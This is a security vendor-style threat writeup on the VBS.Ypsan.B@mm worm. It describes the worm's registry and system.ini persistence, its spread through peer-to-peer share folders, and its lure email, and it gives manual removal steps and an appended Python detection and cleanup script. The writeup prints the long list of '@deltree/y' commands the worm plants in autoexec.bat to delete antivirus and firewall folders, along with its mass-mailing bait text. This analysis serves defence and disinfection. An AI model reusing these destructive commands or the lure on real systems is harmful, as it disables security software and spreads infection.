VBS.Ypsan.B@mm
Tuesday, 05 April 2005
VBS.Ypsan.B@mm is a mass-mailing worm that also attempts to propagate through file-sharing networks.

Type: Worm

Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP

When VBS.Ypsan.B@mm is executed, it performs the following actions:

Creates a folder named C:\WINDOWS\System\Back ups.

Copies itself as the following:

C:\WINDOWS\System\Back ups\Bkupinstall.vbs
C:\WINDOWS\System\Back ups\4-05-05.vbs

Adds the following line to the file C:\windows\system.ini:

shell= explorer.exe C:\WINDOWS\System\Back ups\BkupInstall.vbs

Adds the values:

"BootsCfg" = "wscript.exe C:\WINDOWS\System\Back ups\Bkupinstall.vbs"
"Back Updates" = "wscript.exe C:\WINDOWS\System\Back ups\4-05-05.vbs"

to the registry subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

so that the worm is executed every time Windows starts.

Adds the value:

"NoVirtMemPage" = "1"

to the registry subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

Adds the values:

"NoDeletePrinter" = "1"
"NoClose" = "1"

to the registry subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

(These policy values hide the Virtual Memory button in System Properties, prevent printers from being deleted, and remove the Shut Down command from the Start menu.)

Copies itself to the following folders, if they exist:

%ProgramFiles%\KaZaA Lite\My Shared Folder
%ProgramFiles%\KMD\My Shared Folder
%ProgramFiles%\Morpheus\My Shared Folder
%ProgramFiles%\BearShare\Shared
%ProgramFiles%\Edonkey2000\Incoming

using the following file names:

Porno-Pic.Jpg.vbs
girls.gif.vbs
sluts.gif.vbs
Sex-party.Gif.vbs
sluts girl.jpg.vbs

Note: %ProgramFiles% is a variable that refers to the program files folder. By default, this is C:\Program Files.

Sends itself to all the contacts in the Windows Address Book using Microsoft Outlook. The email has the following characteristics:

Subject: Update today

Message:
The information that you asked for is,
This your friend john here is a free program so you can back up compters
file it does it every mouth. windows does it for you, but doesnt show you
and this program does it for you show you your files and you can back
them up.

Attachment: Bkupinstall.vbs

Attempts to overwrite C:\autoexec.bat with the following lines, which delete the installation folders of common antivirus and security products at the next boot in order to disable them:

@deltree/y c:\antiba~1\*.*
@deltree/y c:\antiba~2\*.*
@deltree/y c:\antiba~1.1\*.*
@deltree/y c:\antiba~1.2\*.*
@deltree/y c:\antiba~1.3\*.*
@deltree/y c:\antiba~1.4\*.*
@deltree/y c:\antiba~1.5\*.*
@deltree/y c:\antiba~1.6\*.*
@deltree/y c:\antiba~1.7\*.*
@deltree/y c:\antiba~1.8\*.*
@deltree/y c:\antivi~1\*.*
@deltree/y c:\antivi~2\*.*
@deltree/y c:\antiviru\*.*
@deltree/y c:\avg\*.*
@deltree/y c:\avp\*.*
@deltree/y c:\avp30\*.*
@deltree/y c:\avx\*.*
@deltree/y c:\avpers~1\*.*
@deltree/y c:\itdef~1\*.*
@deltree/y c:\itdef~2\*.*
@deltree/y c:\comman~1\*.*
@deltree/y c:\cleancih\*.*
@deltree/y c:\esafen\*.*
@deltree/y c:\findvi~1\*.*
@deltree/y c:\f-macro\*.*
@deltree/y c:\f-prot\*.*
@deltree/y c:\f-prot95\*.*
@deltree/y c:\f-secu~1\*.*
@deltree/y c:\fwin\*.*
@deltree/y c:\fwin32\*.*
@deltree/y c:\inocul~1\*.*
@deltree/y c:\inocul~2\*.*
@deltree/y c:\kasper~1\*.*
@deltree/y c:\kasper~2\*.*
@deltree/y c:\mcafee\*.*
@deltree/y c:\mcafee~1\*.*
@deltree/y c:\msav\*.*
@deltree/y c:\norman\*.*
@deltree/y c:\norton~1\*.*
@deltree/y c:\norton~2\*.*
@deltree/y c:\pav\*.*
@deltree/y c:\pccill~1\*.*
@deltree/y c:\pc-cil~1\*.*
@deltree/y c:\nav\*.*
@deltree/y c:\softwin\*.*
@deltree/y c:\tbav\*.*
@deltree/y c:\tbavw95\*.*
@deltree/y c:\toolkit\*.*
@deltree/y c:\trendm~1\*.*
@deltree/y c:\trex\*.*
@deltree/y c:\virus\*.*
@deltree/y c:\vpc\*.*
@deltree/y c:\vs95\*.*
@deltree/y c:\zonela~1\*.*
@deltree/y c:\zonela~2\*.*
@deltree/y c:\progra~1\antiba~1\*.*
@deltree/y c:\progra~1\antiba~2\*.*
@deltree/y c:\progra~1\antiba~1.1\*.*
@deltree/y c:\progra~1\antiba~1.2\*.*
@deltree/y c:\progra~1\antiba~1.3\*.*
@deltree/y c:\progra~1\antiba~1.4\*.*
@deltree/y c:\progra~1\antiba~1.5\*.*
@deltree/y c:\progra~1\antiba~1.6\*.*
@deltree/y c:\progra~1\antiba~1.7\*.*
@deltree/y c:\progra~1\antiba~1.8\*.*
@deltree/y c:\progra~1\antivi~1\*.*
@deltree/y c:\progra~1\antivi~2\*.*
@deltree/y c:\progra~1\avg\*.*
@deltree/y c:\progra~1\avp\*.*
@deltree/y c:\progra~1\avx\*.*
@deltree/y c:\progra~1\avx2000\*.*
@deltree/y c:\progra~1\avpers~1\*.*
@deltree/y c:\progra~1\itdef~1\*.*
@deltree/y c:\progra~1\itdef~2\*.*
@deltree/y c:\progra~1\comman~1\*.*
@deltree/y c:\progra~1\common~1\avpsha~1\*.*
@deltree/y c:\progra~1\common~1\symant~1\*.*
@deltree/y c:\progra~1\datafe~1\*.*
@deltree/y c:\progra~1\deerfi~1.com\*.*
@deltree/y c:\progra~1\f-prot\*.*
@deltree/y c:\progra~1\f-prot95\*.*
@deltree/y c:\progra~1\findvi~1\*.*
@deltree/y c:\progra~1\f-secu~1\*.*
@deltree/y c:\progra~1\f-secure\*.*
@deltree/y c:\progra~1\fsi\*.*
@deltree/y c:\progra~1\fwin\*.*
@deltree/y c:\progra~1\fwin32\*.*
@deltree/y c:\progra~1\grisoft\*.*
@deltree/y c:\progra~1\inocul~1\*.*
@deltree/y c:\progra~1\inocul~2\*.*
@deltree/y c:\progra~1\intern~2\*.*
@deltree/y c:\progra~1\kasper~1\*.*
@deltree/y c:\progra~1\kasper~2\*.*
@deltree/y c:\progra~1\mcafee\*.*
@deltree/y c:\progra~1\mcafee~1\*.*
@deltree/y c:\progra~1\mindso~1\*.*
@deltree/y c:\progra~1\norman\*.*
@deltree/y c:\progra~1\norton~1\*.*
@deltree/y c:\progra~1\norton~2\*.*
@deltree/y c:\progra~1\pandas~1\*.*
@deltree/y c:\progra~1\protec~1\*.*
@deltree/y c:\progra~1\protec~2\*.*
@deltree/y c:\progra~1\quickh~1\*.*
@deltree/y c:\progra~1\nav\*.*
@deltree/y c:\progra~1\signal9\*.*
@deltree/y c:\progra~1\softwin\*.*
@deltree/y c:\progra~1\spysto~1\*.*
@deltree/y c:\progra~1\symant~1\*.*
@deltree/y c:\progra~1\tbav\*.*
@deltree/y c:\progra~1\tinype~1\*.*
@deltree/y c:\progra~1\trendm~1\*.*
@deltree/y c:\progra~1\trendp~1\*.*
@deltree/y c:\progra~1\trojan~1\*.*
@deltree/y c:\progra~1\trojan~2\*.*
@deltree/y c:\progra~1\virusm~1.0\*.*
@deltree/y c:\progra~1\zonela~1\*.*
@deltree/y c:\progra~1\zonela~2\*.*


Edit the System.ini file
If you are running Windows 95/98/Me, follow these steps:

Click Start > Run.
Type the following:

edit c:\windows\system.ini

and then click OK.

(The MS-DOS Editor opens.)

NOTE: If Windows is installed in a different location, make the appropriate path substitution.

In the [boot] section of the file, look for a line similar to:

shell= explorer.exe C:\WINDOWS\System\Back ups\BkupInstall.vbs

If this line exists, delete everything to the right of Explorer.exe.

When you are done, it should look like:

shell = Explorer.exe

Click File > Save.
Click File > Exit.

To edit the Autoexec.bat file
If you are running Windows 95/98/Me, follow these steps:

The function you perform depends on your operating system:
Windows 95/98: Go to step B.
Windows Me: If you are running Windows Me, the Windows Me file-protection process may have made a backup copy of the Autoexec.bat file that you need to edit. If this backup copy exists, it will be in the C:\Windows\Recent folder. Symantec recommends that you delete this file before continuing with the steps in this section. To do this:
Start Windows Explorer.
Browse to and select the C:\Windows\Recent folder.
In the right pane, select the Autoexec.bat file and delete it.

Click Start, and then click Run.
Type the following, and then click OK.

edit c:\autoexec.bat

(The MS-DOS Editor opens.)

Delete the @deltree/y lines that the worm added (the full list appears in the technical details above).

Click File, and then click Save.
Click File, and then click Exit.

To delete the values from the registry
Click Start > Run.
Type regedit
Click OK.

Navigate to the subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

In the right pane, delete the values:

"BootsCfg" = "wscript.exe C:\WINDOWS\System\Back ups\Bkupinstall.vbs"
"Back Updates" = "wscript.exe C:\WINDOWS\System\Back ups\4-05-05.vbs"

Navigate to the subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

In the right pane, reset the value:

"NoVirtMemPage" = "1"

Navigate to the subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

In the right pane, reset the values:

"NoDeletePrinter" = "1"
"NoClose" = "1"

Exit the Registry Editor.
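As an added example (not part of the Symantec writeup), the following Python checks the three persistence points described above, the [boot] shell= line in system.ini, the Run-key values and the @deltree lines in autoexec.bat, and applies the same system.ini and autoexec.bat fixes the manual steps describe. The file contents and Run-key values are constructed samples; a live check would read the real files and query the Run key instead.

```python
import re
# Constructed samples (not from a real host) mirroring the writeup's persistence points.
SAMPLE_SYSTEM_INI = r"""[boot]
shell= explorer.exe C:\WINDOWS\System\Back ups\BkupInstall.vbs
[386Enh]
"""
SAMPLE_RUN_VALUES = {
    "BootsCfg": r"wscript.exe C:\WINDOWS\System\Back ups\Bkupinstall.vbs",
    "Back Updates": r"wscript.exe C:\WINDOWS\System\Back ups\4-05-05.vbs",
    "VendorTray": r"C:\Program Files\Vendor\tray.exe",  # benign entry, must not match
}
SAMPLE_AUTOEXEC = ("@deltree/y c:\\antivi~1*.*\r\n@deltree/y c:\\progra~1\\symant~1*.*\r\n"
                   "SET PATH=C:\\WINDOWS\r\n")
SHELL_RE = re.compile(r"^\s*shell\s*=\s*(.*)$", re.IGNORECASE)
DELTREE_RE = re.compile(r"^\s*@?deltree\s*/y\b", re.IGNORECASE)

def _boot_shell_lines(system_ini):
    # Yield (line index, value) for every shell= line inside the [boot] section.
    in_boot = False
    for i, line in enumerate(system_ini.splitlines()):
        if line.strip().startswith("["):
            in_boot = line.strip().lower() == "[boot]"
        elif in_boot and (m := SHELL_RE.match(line)):
            yield i, m.group(1)

def check_shell_line(system_ini):
    """Return the shell= value if it launches anything beyond explorer.exe."""
    for _, value in _boot_shell_lines(system_ini):
        tokens = value.split()
        if len(tokens) != 1 or tokens[0].lower() != "explorer.exe":
            return value
    return None

def clean_system_ini(system_ini):
    """Same fix as the manual steps: reduce the [boot] shell= line to the default."""
    lines = system_ini.splitlines()
    for i, _ in _boot_shell_lines(system_ini):
        lines[i] = "shell=Explorer.exe"
    return "\n".join(lines) + "\n"

def suspicious_run_values(run_values):
    """Run-key values that hand a .vbs file to a script host."""
    return {n: d for n, d in run_values.items() if ".vbs" in d.lower()
            and ("wscript.exe" in d.lower() or "cscript.exe" in d.lower())}

def deltree_lines(autoexec):
    return [l for l in autoexec.splitlines() if DELTREE_RE.match(l)]
def clean_autoexec(autoexec):
    # Drop the deltree lines, keep everything else with CRLF endings.
    return "\r\n".join(l for l in autoexec.splitlines()
                       if not DELTREE_RE.match(l)) + "\r\n"
```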
 